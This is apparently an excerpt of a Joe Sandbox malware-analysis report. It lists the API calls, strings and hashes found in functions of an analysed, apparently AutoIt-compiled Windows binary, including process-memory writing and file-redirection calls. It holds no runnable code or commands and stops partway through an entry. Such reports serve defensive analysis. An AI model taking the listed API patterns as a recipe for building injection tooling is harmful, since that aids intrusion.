• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: 7dcccba414e16e9ac9be0cb63ab2a4e062831420a760d87b32b591aa2e0b7b41
• Instruction ID: 2ed5e882f1aabf1f8a0bf5a05fe1d1a75ab7b9bcd1c6918f782ee872059abc09
• Opcode Fuzzy Hash: 7dcccba414e16e9ac9be0cb63ab2a4e062831420a760d87b32b591aa2e0b7b41
• Instruction Fuzzy Hash: 2A015731D0161ADBCF10EFE4E8489EEBB78FB4A311F400446EA81B2194CB39555087A5
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 010280C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 010280CA
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 010280D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 010280E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 010280F6
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: c7be52eed0893dd56925626d419155394db7cfe242ba133b96e5eb66590dc76d
• Instruction ID: 58d6f391577b316411e4292daca5efde3acb303e9d71d1f4be60e4dcf6e88151
• Opcode Fuzzy Hash: c7be52eed0893dd56925626d419155394db7cfe242ba133b96e5eb66590dc76d
• Instruction Fuzzy Hash: 54F0C234205315AFEB211FA8EC8CE6B3FECEF4A754B144056F985C3180CB6A9840DB60
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0102C1F7
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0102C20E
• MessageBeep.USER32(00000000), ref: 0102C226
• KillTimer.USER32(?,0000040A), ref: 0102C242
• EndDialog.USER32(?,00000001), ref: 0102C25C
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 0ecb5a14d0dedbc5fe7c6f26c8a10beb915a0efa00bac4b880859ba2e3eeda1b
• Instruction ID: c187b373c758b01c5cadd3ff0361f2100c26b97936fbc0ce42312d3ed6bd9a95
• Opcode Fuzzy Hash: 0ecb5a14d0dedbc5fe7c6f26c8a10beb915a0efa00bac4b880859ba2e3eeda1b
• Instruction Fuzzy Hash: 0801843040431597FB306B64DD4EF9B7BA8BB05705F000259E6C6914D19BA965488B50
APIs
• EndPath.GDI32(?), ref: 00FD13BF
• StrokeAndFillPath.GDI32(?,?,0100B888,00000000,?), ref: 00FD13DB
• SelectObject.GDI32(?,00000000), ref: 00FD13EE
• DeleteObject.GDI32 ref: 00FD1401
• StrokePath.GDI32(?), ref: 00FD141C
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: 4f3cdb44ced7cbaceb894b7cdfcec44aafee675d3ddb3dd1c4caf9e5d5c1959e
• Instruction ID: fcfb51b793a010f432a15937d82e8ff28e108b4522185b187d29b06d037c17aa
• Opcode Fuzzy Hash: 4f3cdb44ced7cbaceb894b7cdfcec44aafee675d3ddb3dd1c4caf9e5d5c1959e
• Instruction Fuzzy Hash: 73F0C931005309ABDB329F66EC5C75A3BA5B702326F1C8216F4A9991F8C73F4995EF50
APIs
  • Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
  • Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01
  • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
  • Part of subcall function 00FD7A51: _memmove.LIBCMT ref: 00FD7AAB
• __swprintf.LIBCMT ref: 00FE2ECD
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FE2D66
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 1943609520-557222456
• Opcode ID: 3f4e5f35f83ce2b277f44c516b03347f87023d907e23ec2a14a27925bb2d7a68
• Instruction ID: b4863e5cfda650b442068804bec9783a272e0ba9415f46b31b6b2c1cefb4bbcc
• Opcode Fuzzy Hash: 3f4e5f35f83ce2b277f44c516b03347f87023d907e23ec2a14a27925bb2d7a68
• Instruction Fuzzy Hash: E9919A725083519FC714EF28CC85C6EB7A9EF85710F04091EF9829B2A1EA78ED44EB52
APIs
  • Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770
• CoInitialize.OLE32(00000000), ref: 0103B9BB
• CoCreateInstance.OLE32(01062D6C,00000000,00000001,01062BDC,?), ref: 0103B9D4
• CoUninitialize.OLE32 ref: 0103B9F1
  • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
  • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
• Opcode ID: c2c649161ae811f58229d2ec934dc843cef5b98c050846f0c9428239bfe87cf5
• Instruction ID: 21f12f476eec421795d1c7e5b90057d34d1c3c985262ac0ef329aa30b90309ce
• Opcode Fuzzy Hash: c2c649161ae811f58229d2ec934dc843cef5b98c050846f0c9428239bfe87cf5
• Instruction Fuzzy Hash: 71A168756043059FC714EF14C884D2ABBEAFF89718F088989F8999B362CB75EC45CB91
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00FF50AD
                                                                      • Part of subcall function 010000F0: __87except.LIBCMT ref: 0100012B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__87except__start
                                                                    • String ID: pow
                                                                    • API String ID: 2905807303-2276729525
                                                                    • Opcode ID: fce1586714ea808536ba15585c818c8b58b618aaab200636873d971532aa26d2
                                                                    • Instruction ID: e9903e35871a7c2f509409aa6207fb7e30fad0fd62ef9dcb732fd7fc987e8d7f
                                                                    • Opcode Fuzzy Hash: fce1586714ea808536ba15585c818c8b58b618aaab200636873d971532aa26d2
                                                                    • Instruction Fuzzy Hash: 5D513071D0890B96F7236618C9103BE3BD49F40BA0F208D99F7D5452FDDE3989C4AB86
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$_memmove
                                                                    • String ID: ERCP
                                                                    • API String ID: 2532777613-1384759551
                                                                    • Opcode ID: f3754cf8a93f4a7373c65baa1d1a47e09561b7c83ba1a76e224cccdf44336ee3
                                                                    • Instruction ID: 3524e4bcb40fbb2b52e9e0058e3fb3f20cfafa5c55fca4d38473a8de96eb5ae6
                                                                    • Opcode Fuzzy Hash: f3754cf8a93f4a7373c65baa1d1a47e09561b7c83ba1a76e224cccdf44336ee3
                                                                    • Instruction Fuzzy Hash: 3951B071900709DFDB24EF66C8817AABBE4EF54354F20856EE98AD7251E734AA40DB40
                                                                    APIs
                                                                      • Part of subcall function 010314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01029296,?,?,00000034,00000800,?,00000034), ref: 010314E6
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0102983F
                                                                      • Part of subcall function 01031487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 010314B1
                                                                      • Part of subcall function 010313DE: GetWindowThreadProcessId.USER32(?,?), ref: 01031409
                                                                      • Part of subcall function 010313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0102925A,00000034,?,?,00001004,00000000,00000000), ref: 01031419
                                                                      • Part of subcall function 010313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0102925A,00000034,?,?,00001004,00000000,00000000), ref: 0103142F
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010298AC
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010298F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 0d2fa37bda3a28d4db1a01f9d1359d5d77212147586b6148232c42caaf65b9c1
                                                                    • Instruction ID: adc1410d350102cac329800d02fdfe058ea939134a6a4af6e42239e27167e5ce
                                                                    • Opcode Fuzzy Hash: 0d2fa37bda3a28d4db1a01f9d1359d5d77212147586b6148232c42caaf65b9c1
                                                                    • Instruction Fuzzy Hash: FF41617690122DBFDB10DFA8CD81ADEBBB8EF59700F004095FA85B7180DA756E45CBA0
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0105F910,00000000,?,?,?,?), ref: 010579DF
                                                                    • GetWindowLongW.USER32 ref: 010579FC
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01057A0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: 7e7966d5e3a0538ee1bc7c71febd82b6ca29dc9a3c656ee4dbbaafee8daa73ad
                                                                    • Instruction ID: 9dbfa1fb0185f1013433ca85e3cf617e160b69fba403abf96f9946c9a9f4a13d
                                                                    • Opcode Fuzzy Hash: 7e7966d5e3a0538ee1bc7c71febd82b6ca29dc9a3c656ee4dbbaafee8daa73ad
                                                                    • Instruction Fuzzy Hash: 95310131200206ABDB918E38CC05BEB7BA9FF45324F644715FDB5932D0D735E950AB60
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01057461
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01057475
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01057499
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: f93e34ff16b593fdbf31acba51e99a8f02b83d610eefd7ad54ec2c0759dc4765
                                                                    • Instruction ID: 602cfa531fb149d37b2a81200ef306b00292af770c83bd869d6667485413d5b9
                                                                    • Opcode Fuzzy Hash: f93e34ff16b593fdbf31acba51e99a8f02b83d610eefd7ad54ec2c0759dc4765
                                                                    • Instruction Fuzzy Hash: E621B132500219ABDF228E64CC45FEB3FAAFB48724F110154FE956B190DB75A851DBA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01057C4A
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01057C58
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01057C5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: 4a6f5d9cfb8a0c0c0507243c12513ef6fcac6780f97d44bb57951b79bb189c27
                                                                    • Instruction ID: adeda2ac695ea028d8a942df262576c2bb0e6fddd6016c7a19d32674af04b59f
                                                                    • Opcode Fuzzy Hash: 4a6f5d9cfb8a0c0c0507243c12513ef6fcac6780f97d44bb57951b79bb189c27
                                                                    • Instruction Fuzzy Hash: A12171B5600209AFEB51DF28DCD1DA73BEDEF4A354B540059FA519B351CA36EC019B60
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01056D3B
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01056D4B
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01056D70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: f04a5a7c987ced840dd6d17d7472b1494632de1df3ff85640afc311049406ca1
                                                                    • Instruction ID: 5d7d28e005c445745e9587fc172e475174e1d4ed042dab0837700dd598cd007a
                                                                    • Opcode Fuzzy Hash: f04a5a7c987ced840dd6d17d7472b1494632de1df3ff85640afc311049406ca1
                                                                    • Instruction Fuzzy Hash: 5421C532600118BFDF629F58CC44FBB3BBAFF89750F418164F9859B191C6769C5187A0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01057772
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01057787
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01057794
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 14be9dc689ce0f30246bef28701f7cde05ff096aa1da1a4702e12b257c23d5d0
                                                                    • Instruction ID: 98d1e383885faa6be54d8c8981198e0d9ec88b7d8ded53d6cced037c30d5466b
                                                                    • Opcode Fuzzy Hash: 14be9dc689ce0f30246bef28701f7cde05ff096aa1da1a4702e12b257c23d5d0
                                                                    • Instruction Fuzzy Hash: D811E372240209BAEF655E65DC05FEB7BA9FF88B54F014119FA81A6090D672E411DB20
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FD4B83,?), ref: 00FD4C44
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FD4C56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-1355242751
                                                                    • Opcode ID: f50a7139c0eb3c6b488e0dbcf65d32ec720a53d994fce10f8538c402fec79357
                                                                    • Instruction ID: 03431def4457027663ff41f33a775008bc5094e4ffb0d12f1023067bcc14e31f
                                                                    • Opcode Fuzzy Hash: f50a7139c0eb3c6b488e0dbcf65d32ec720a53d994fce10f8538c402fec79357
                                                                    • Instruction Fuzzy Hash: 51D01270911713CFD7205F32D91860777D5AF05251B15882E94E5DA614E678D880C754
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,01051039), ref: 01050DF5
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01050E07
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2574300362-4033151799
                                                                    • Opcode ID: beb25c94d655b79683f2fde2988061d6f3bae58c4b88ba4316944dacffe4a564
                                                                    • Instruction ID: a8b12a1aa8194a33a73b2c0907bf8b99cb220c6e099f5426bcd5883f7cda8759
                                                                    • Opcode Fuzzy Hash: beb25c94d655b79683f2fde2988061d6f3bae58c4b88ba4316944dacffe4a564
                                                                    • Instruction Fuzzy Hash: C2D0C730400323CFD320AF7AC80828B76E4AF01352F208C2EA8C2C6104E7B9D090CB64
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FD4BD0,?,00FD4DEF,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4C11
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FD4C23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-3689287502
                                                                    • Opcode ID: a2a9a57c4872d9df309bd5f0c0ec1ae0623836490ec6e1057449d75fddbcb196
                                                                    • Instruction ID: 8e8beba90252b50a7e949639fda30149a5f4676c639f6a9f248ecccbea8ef78b
                                                                    • Opcode Fuzzy Hash: a2a9a57c4872d9df309bd5f0c0ec1ae0623836490ec6e1057449d75fddbcb196
                                                                    • Instruction Fuzzy Hash: D1D01230911713CFD7206F71D958607B6D6EF09251F158C2E94C5D6610E7B8D880CB51
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,01048CF4,?,0105F910), ref: 010490EE
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01049100
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
